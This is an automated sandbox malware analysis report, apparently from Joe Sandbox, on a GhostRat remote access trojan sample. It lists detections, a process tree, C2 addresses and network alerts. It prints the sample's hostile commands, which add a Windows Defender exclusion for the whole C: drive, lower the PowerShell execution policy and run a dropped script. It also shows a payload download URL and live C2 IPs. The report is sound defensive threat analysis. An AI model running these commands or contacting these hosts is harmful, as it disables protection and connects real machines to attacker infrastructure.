Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
leBwnyHIgx.exe

Overview

General Information

Sample name:leBwnyHIgx.exe
renamed because original name is a hash value
Original sample name:51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845.exe
Analysis ID:1585743
MD5:2a7776214c4870137fe8aabb231cf52e
SHA1:3134458ad9ff7a6e76543427794fbcee1d7eda07
SHA256:51434b554c4e3b123e0a90db3048ec6d5edaed4cdb245c8f9e3dbddb378f2845
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • leBwnyHIgx.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
    • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WmiPrvSE.exe (PID: 2492 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • leBwnyHIgx.exe (PID: 180 cmdline: "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe" MD5: 2A7776214C4870137FE8AABB231CF52E)
      • cmd.exe (PID: 2180 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5684 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2664 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5444 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5928 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6616 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 2916 cmdline: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6100 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

Threatname: GhostRat

{"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 33 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.leBwnyHIgx.exe.44e05eb.12.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              5.3.leBwnyHIgx.exe.4252c53.12.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                5.3.leBwnyHIgx.exe.428486b.37.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  5.2.leBwnyHIgx.exe.4252c53.9.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    5.3.leBwnyHIgx.exe.4252c53.30.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 79 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6540, ProcessName: cmd.exe
                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 2916, ProcessName: cmd.exe
                      Sigma detected: Suspicious Script Execution From Temp Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2916, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1, ProcessId: 6100, ProcessName: powershell.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2032, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\leBwnyHIgx.exe", ParentImage: C:\Users\user\Desktop\leBwnyHIgx.exe, ParentProcessId: 2004, ParentProcessName: leBwnyHIgx.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6540, ProcessName: cmd.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 2032, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T07:15:33.044544+010020528751A Network Trojan was detected192.168.2.449740154.82.85.10715091TCP
                      2025-01-08T07:16:43.500651+010020528751A Network Trojan was detected192.168.2.449741154.82.85.10715091TCP
                      2025-01-08T07:17:55.290074+010020528751A Network Trojan was detected192.168.2.450009154.82.85.10715091TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T07:15:05.390726+010020010463Misc activity47.79.48.230443192.168.2.449732TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: leBwnyHIgx.exe.180.5.memstrminMalware Configuration Extractor: GhostRat {"C2 url": ["154.82.85.107:15091", "154.82.85.107:15092"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeReversingLabs: Detection: 23%
                      Multi AV Scanner detection for submitted file
                      Source: leBwnyHIgx.exeVirustotal: Detection: 29%Perma Link
                      Source: leBwnyHIgx.exeReversingLabs: Detection: 23%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                      Source: leBwnyHIgx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: leBwnyHIgx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb source: leBwnyHIgx.exe, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: \Release\Code_Shellcode.pdb,''GCTL source: leBwnyHIgx.exe, 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000005.00000002.4133424072.0000000000D90000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbu source: powershell.exe, 0000000B.00000002.1806539404.0000000006E91000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0 source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1810597919.0000000007F34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb{/; source: powershell.exe, 0000000B.00000002.1806539404.0000000006E4E000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: z:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: x:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: v:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: t:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: r:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: p:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: n:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: l:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: j:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: h:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: f:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: b:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: y:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: w:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: u:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: s:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: q:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: o:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: m:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: k:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: i:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: g:Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040C86C FindFirstFileW,FindClose,0_2_0040C86C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_0040C2A0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,0_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040C86C FindFirstFileW,FindClose,5_2_0040C86C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,5_2_0040C2A0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,5_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exeCode function: 5_2_030780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,5_2_030780F0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 154.82.85.107:15091
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49741 -> 154.82.85.107:15091
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:50009 -> 154.82.85.107:15091
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 154.82.85.107:15091
                      Source: Malware configuration extractorURLs: 154.82.85.107:15092
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 154.82.85.107 ports 18852,8853,15092,15091,3,5,8
                      Source: global trafficTCP traffic: 192.168.2.4:49730 -> 154.82.85.107:8853
                      Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network trafficSuricata IDS: 2001046 - Severity 3 - ET MALWARE UPX compressed file download possible malware : 47.79.48.230:443 -> 192.168.2.4:49732
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: unknownTCP traffic detected without corresponding DNS query: 154.82.85.107
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exeCode function: 0_2_00421DFC VirtualAlloc,WSAStartup,socket,VirtualProtect,WriteProcessMemory,connect,recv,closesocket,0_2_00421DFC
                      Source: global trafficHTTP traffic detected: GET /wpsv.5.6.3.exe HTTP/1.1User-Agent: URLDownloaderHost: xrpy.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: xrpy.oss-ap-southeast-1.aliyuncs.com
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: leBwnyHIgx.exe, 00000000.00000002.2078649644.0000000003906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m76u8s
                      Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                      Source: powershell.exe, 00000003.00000002.1703418182.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2029415416.000000000701B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000014.00000002.1996269596.0000000002971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
                      Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1780310479.00000000028CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: wpsv.5.6.3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
